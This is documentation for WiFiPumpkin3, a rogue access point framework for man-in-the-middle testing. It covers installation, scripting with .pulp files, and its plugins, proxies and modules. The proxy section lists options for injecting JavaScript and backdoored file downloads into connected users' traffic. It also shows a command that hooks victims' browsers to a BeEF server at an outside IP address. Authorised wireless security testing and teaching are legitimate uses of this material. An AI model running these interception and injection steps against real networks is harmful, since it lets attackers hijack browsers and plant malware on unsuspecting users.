WiFiPumpkin3 is a powerful framework for rogue access point attacks, written in Python, that allows security researchers, red teamers and reverse engineers to mount a wireless network to conduct a man-in-the-middle attack.
Main Features
Supported Platforms
NOTE: wp3 requires hostapd to be installed.
Installation
wifipumpkin3 is written in Python 3, so you will need to have a working Python (version 3.7 or later) on your machine.
Note that
Requirements
You will need to have a Wi-Fi adapter that supports Access-Point (AP) mode. The following list of OSs represents recommended environments to run wifipumpkin3 (wp3), as most of the required dependencies are pre-installed. VMs or Docker are also recommended.
OS | Version |
---|---|
Ubuntu | 18.04 LTS bionic |
Docker | Ubuntu 18.04.4 LTS bionic |
Based On Debian Procedure
wifipumpkin3 uses port 53 to mount its Python DNS server. When I tried to install on Ubuntu 18.04, I got some errors because “port 53 is used by another process”. This problem is caused by systemd-resolved; to solve it, just follow the step below.
sudo ln -sf /run/systemd/resolve/resolv.conf /etc/resolv.conf
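To confirm which process is actually holding port 53 before and after the change, the listener table can be filtered as below. This is an added example, not part of the wifipumpkin3 project; the function names and the sample `ss` output are constructed for illustration.

```shell
#!/bin/sh
# Added example: report which sockets are bound to port 53, reading
# `ss -H -lntup` output on stdin.

# Constructed sample of `ss -H -lntup` on a host running systemd-resolved.
sample_ss_output() {
cat <<'EOF'
udp UNCONN 0 0    127.0.0.53%lo:53 0.0.0.0:* users:(("systemd-resolve",pid=612,fd=12))
udp UNCONN 0 0    0.0.0.0:5353     0.0.0.0:* users:(("avahi-daemon",pid=540,fd=12))
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* users:(("systemd-resolve",pid=612,fd=13))
tcp LISTEN 0 128  0.0.0.0:22       0.0.0.0:* users:(("sshd",pid=801,fd=3))
EOF
}

# Print "proto local-address process" for every socket bound to port 53.
port53_holders() {
    awk '
        $5 ~ /:53$/ {
            # Field 7 looks like users:(("name",pid=N,fd=M)); the process
            # name is the text between the first pair of double quotes.
            n = split($7, q, "\"")
            name = (n >= 3) ? q[2] : "unknown"   # column is absent without root
            print $1, $5, name
        }
    '
}

# Real use (root is needed to see processes owned by other users):
#   ss -H -lntup | port53_holders
sample_ss_output | port53_holders
```

An empty result means nothing is bound to port 53 and the DNS server can take it.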
Installation Procedure
If you have Python 3.7 or later installed on your machine, it is very simple to install wp3. Follow these steps:
Debian/Ubuntu
It is highly recommended to install some system packages (OS-level dependencies).
sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo make install
or grab a Debian *.deb package from GitHub Releases
$ sudo dpkg -i wifipumpkin3-1.0.0-all.deb
Install on Kali Linux
Kali Linux has python3.8 installed by default, which is compatible with wp3. I recommend installing some system packages (OS-level dependencies).
$ sudo apt install libssl-dev libffi-dev build-essential
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
Now we need to install PyQt5, which is very easy:
sudo apt install python3-pyqt5
or check whether PyQt5 is installed successfully:
python3 -c "from PyQt5.QtCore import QSettings; print('done')"
Now, if you got the message done, nice. The next step is to install wp3:
$ sudo python3 setup.py install
If you see the message below, everything is OK!
Finished processing dependencies for wifipumpkin3==1.0.0
now, let’s execute the app:
$ sudo wifipumpkin3
All done; you will see the CLI of wp3.
Installation python virtualenv
Virtualenv is a tool used to create an isolated Python environment. Virtualenv is the easiest and recommended way to configure a custom Python environment.
version of PyQt5
To install, change the PyQt5 version in the requirements.txt file from `PyQt5==5.14.0` to `PyQt5==5.14.2`. Version 5.14.2 works fine in a virtualenv, without errors from the python-sip dependencies.
$ sudo python3.7 -m pip install --upgrade pip
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo python3.7 -m pip install virtualenv
Now you need to execute the following as the superuser (root):
# virtualenv -p python3.7 venv
# source venv/bin/activate
# make install_env
If you see the message below, everything is OK!
Finished processing dependencies for wifipumpkin3==1.0.0
now, let’s execute the app:
# wifipumpkin3
All done; you will see the CLI of wp3 with the virtualenv activated.
When finished working in the virtual environment, you can deactivate it by running the following:
# deactivate
Installation on Docker Container
Docker is an open platform for developing, shipping, and running applications. Docker enables you to separate your applications from your infrastructure so you can deliver software quickly. wp3 is fully compatible with running in a Docker container. Let's go:
https://docs.docker.com/get-docker/
With docker.io installed and working fine, let's take a look at how to mount a container with wp3. How to install on Ubuntu:
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo docker build -t "wifipumpkin3" .
The commands above will download and build a new container image for us called wifipumpkin3. You'll see Docker step through each instruction in your Dockerfile, building up your image as it goes. If successful, the build process should end with a message:
Successfully tagged wifipumpkin3
Now you need to run your image as a container, start a container based on your new image:
$ sudo docker run --privileged -ti --rm --name wifipumpkin3 --net host "wifipumpkin3"
All done; you will see the CLI of wp3 running in Docker with docker mode activated. 😉
About wireless adapters
Your wireless adapter and your kernel driver must support AP mode. In order to check this, execute this shell command:
iw list
If there is ‘AP’ in the list of “Supported interface modes”, your card has support for the desired mode.
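The same check can be scripted per radio instead of read by eye. This is an added example, not part of wifipumpkin3; the function names and the sample `iw list` output are constructed for illustration.

```shell
#!/bin/sh
# Added example: print every wiphy whose "Supported interface modes"
# block in `iw list` output (stdin) contains AP.

# Constructed sample of `iw list` output for two radios.
sample_iw_list() {
cat <<'EOF'
Wiphy phy0
    Supported Ciphers:
        * WEP40 (00-0f-ac:1)
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * AP/VLAN
         * monitor
    Band 1:
Wiphy phy1
    Supported interface modes:
         * managed
         * monitor
    software interface modes (can always be added):
         * AP/VLAN
EOF
}

ap_capable_phys() {
    awk '
        $1 == "Wiphy" { phy = $2; in_modes = 0; next }
        /Supported interface modes:/ { in_modes = 1; next }
        in_modes && $1 == "*" {
            if ($2 == "AP") print phy   # exact match: AP/VLAN alone does not count
            next
        }
        { in_modes = 0 }                # any other line ends the modes block
    '
}

# Real use:
#   iw list | ap_capable_phys
sample_iw_list | ap_capable_phys
```

Bullets under other headings, such as the software interface modes list, are ignored, so only hardware AP support is reported.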
Another method:
lspci -k | grep -A 3 -i network
(example module: ath9k) Next, use the command below to find out your Wi-Fi capabilities (replace ath9k with your kernel driver):
modinfo ath9k | grep depend
If the above output includes “mac80211”, it means your Wi-Fi card will support AP mode. The adapter needs to have drivers for GNU/Linux.
Usage
Interactive Session
Once you have started the tool with sudo wifipumpkin3, you'll be presented with an interactive session like the Metasploit framework, where you can enable or disable modules, plugins and proxies, configure the AP, etc.
The CLI is very simple. The basic commands you'll need perform operations such as setting session information for the access point (AP) (bssid, channel, interface), starting/stopping the access point, and monitoring the activity of clients joined to the AP.
Pulps
Pulps makes reference to pulp taken from a pumpkin, which can be used for various mixtures. It is possible to script your interactive session using pulp files. Pulps (script files with a .pulp extension) are a powerful way to automate your attack, like Metasploit's .rc files, where each line of the file is a command that'll be executed one by one.
Let's take a look at how to create a script that sets the interface, starts without a proxy, sets the SSID of the network, disables logging for DNS, and starts the access point.
# configure the interface
set interface wlan1
# set name of access point will be created
set ssid demo
# set noproxy plugin
set proxy noproxy
# ignore all log from pydns_server
ignore pydns_server
# start the Access Point
start
Once saved as a demo.pulp file, you'll be able to load and execute it via:
sudo wifipumpkin3 --pulp /path/to/demo.pulp
If you do not want to use a .pulp file, there is an option to use the parameter --xpulp or -x, where each command can either be executed singularly or concatenated by ; in a string. For example:
sudo wifipumpkin3 --xpulp "set interface wlan1; set ssid demo; set proxy noproxy; start"
Arguments Commands
The basic command line arguments ( wifipumpkin3 -h ) are:
-i INTERFACE
Network interface to bind to; if empty, the default interface is that of the old session started.
-s SESSION
Session for continuing an attack; if you pass the old session id, all logs will be added to the same session.
--pulp PULP
Interactive sessions can be scripted with a .pulp file, a powerful way to automate your attack.
--xpulp XPULP
Each command can either be executed singularly, or concatenated by ; in a string.
--wireless-mode WIRELESS_MODE
Use this option to set the wireless mode (static, docker). The default is static mode, but you can change it if you want to run in a Docker container.
--no-colors
Disable terminal colors and effects.
-v, --version
Show the program's version number and exit.
Core Commands
jobs
mode
plugins
proxys
show
search
use
Examples
Plugins
Plugins are designed to add features to the WP3 core and run in parallel with the access point (AP); WP3 provides facilities to develop plugins. Generally speaking, there are really only a few things you have to do in order to get a plugin working.
Info
Most importantly, you can run multiple plugins simultaneously, because plugins are designed only to monitor and analyse the traffic generated by users connected to the access point.
The basic command guidelines for plugins are:
If you want to enable or disable a plugin, use the command below.
wp3 > set plugin plugin_name true/false
If the plugin has subplugins, typing plugins shows some options you can set. You can enable/disable subplugins with the command below (press tab to autocomplete ;)):
wp3 > set plugin_name.subplugins_name true/false
Plugin developers and users are welcome to contribute their plugins to this project; take a look at the guidelines on how to create a plugin.
Proxys
Proxies are designed to add features to the WP3 core and run in parallel with the access point (AP), but redirect all traffic with iptables. Proxies work by intercepting a request, modifying the request if necessary, then handling or forwarding the request to its destination. When a user connects to an AP, the transparent proxy intercepts the request before passing it on to the provider.
Info
Most importantly, you can run only one proxy at a time, because proxies are designed to manipulate data packets by redirecting all data to a specific port number.
Available proxies:
The basic command guidelines for proxies are:
If you want to select a proxy, use the command below.
wp3 > set proxy proxy_name
If the proxy has plugins, typing proxys shows some options you can set. You can enable/disable a plugin with the command below (press tab to autocomplete ;)):
wp3 > set proxy_name.plugin_name true/false
The example above enables/disables a plugin, but you can use the same syntax to configure a plugin parameter. You can see the parameters by typing info proxy_name, or by typing as in the example below and using tab to autocomplete.
wp3 > set pumpkinproxy.
pumpkinproxy.beef                            pumpkinproxy.html_inject
pumpkinproxy.beef.url_hook                   pumpkinproxy.html_inject.content_path
pumpkinproxy.downloadspoof                   pumpkinproxy.js_inject
pumpkinproxy.downloadspoof.backdoorExePath   pumpkinproxy.js_inject.url
pumpkinproxy.downloadspoof.backdoorPDFpath   pumpkinproxy.no-cache
pumpkinproxy.downloadspoof.backdoorWORDpath  pumpkinproxy.replaceImages
pumpkinproxy.downloadspoof.backdoorXLSpath   pumpkinproxy.replaceImages.path
wp3 > set pumpkinproxy.
Now let's set the url_hook parameter of the beef plugin to inject JavaScript into all HTTP requests.
wp3 > set pumpkinproxy.beef.url_hook http://172.16.149.141:3000/hook.js
Proxy developers and users are welcome to contribute their proxies to this project; take a look at the guidelines on how to create a proxy.
Modules
A module provides a feature that does not need to be used with the access point. Most modules are designed to add new functionality to an attack, like device discovery, service enumeration, performing deauthentication attacks, etc. Modules are introduced to add more functionality to complement the attack.
Info
The syntax of modules basically follows the structure of `metasploit` modules.
The basic core command guidelines:
Commands | Descriptions |
---|---|
set | set options for module |
back | go back one level |
help | show available commands |
options | show options of current module |
run | execute module |
Module developers and users are welcome to contribute their modules to this project; take a look at the guidelines on how to create a module.